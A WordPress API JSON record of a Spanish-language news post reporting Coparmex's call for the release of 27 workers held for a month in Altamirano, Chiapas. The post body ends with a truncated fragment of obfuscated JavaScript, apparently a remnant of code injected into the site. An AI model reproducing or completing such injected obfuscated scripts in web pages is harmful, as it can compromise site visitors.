{"id":347,"date":"2022-03-09T01:07:24","date_gmt":"2022-03-09T01:07:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=347"},"modified":"2022-03-09T01:07:26","modified_gmt":"2022-03-09T01:07:26","slug":"coparmex-nacional-se-pronuncia-por-trabajadores-retenidos-en-altamirano","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=347","title":{"rendered":"Coparmex Nacional se pronuncia por trabajadores retenidos en Altamirano"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"363\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0023.jpg\" alt=\"\" class=\"wp-image-348\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0023.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0023-300x151.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 8 de marzo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este martes, Jos\u00e9 Medina Mora Icaza, presidente nacional de la Confederaci\u00f3n Patronal de la Rep\u00fablica Mexicana (Coparmex) hizo un llamado al gobierno del estado para que atienda el tema de los retenidos en Altamirano.<\/p>\n\n\n\n<p>A trav\u00e9s de un mensaje personal pidi\u00f3 al gobierno del estado y a la secretar\u00eda de gobernaci\u00f3n para que se libere con vida a los trabajadores y personas secuestrados desde hace m\u00e1s de un mes por un conflicto pol\u00edtico-social en este lugar.<\/p>\n\n\n\n<p>Este lunes 7 de marzo se cumpli\u00f3 un mes de la retenci\u00f3n de los 27 trabajadores de diferentes empresas.<\/p>\n\n\n\n<p>Los familiares realizaron una marcha para exigir que se aplique la ley en este caso.<\/p>\n\n\n\n<p>En este sentido los familiares expresaron su preocupaci\u00f3n ante el video que circul\u00f3 en redes sociales donde se mostraba a los trabajadores en medio de un bosque y con dos \u00e1nforas con gasolina.<\/p>\n\n\n\n<p>Han sido diferentes los sectores los que se han pronunciado por este tema y la Coparmex Nacional no ha sido la excepci\u00f3n para que este tema se resuelva de una vez por todas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 8 de marzo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este martes, Jos\u00e9 Medina Mora Icaza, presidente nacional de la Confederaci\u00f3n Patronal de la Rep\u00fablica Mexicana (Coparmex) hizo un llamado al gobierno del estado para que atienda el tema de los retenidos en Altamirano. A trav\u00e9s de un mensaje personal pidi\u00f3 al gobierno &hellip;<\/p>\n","protected":false},"author":2,"featured_media":348,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-347","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/347","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=347"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/347\/revisions"}],"predecessor-version":[{"id":349,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/347\/revisions\/349"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/348"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=347"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=347"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=347"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}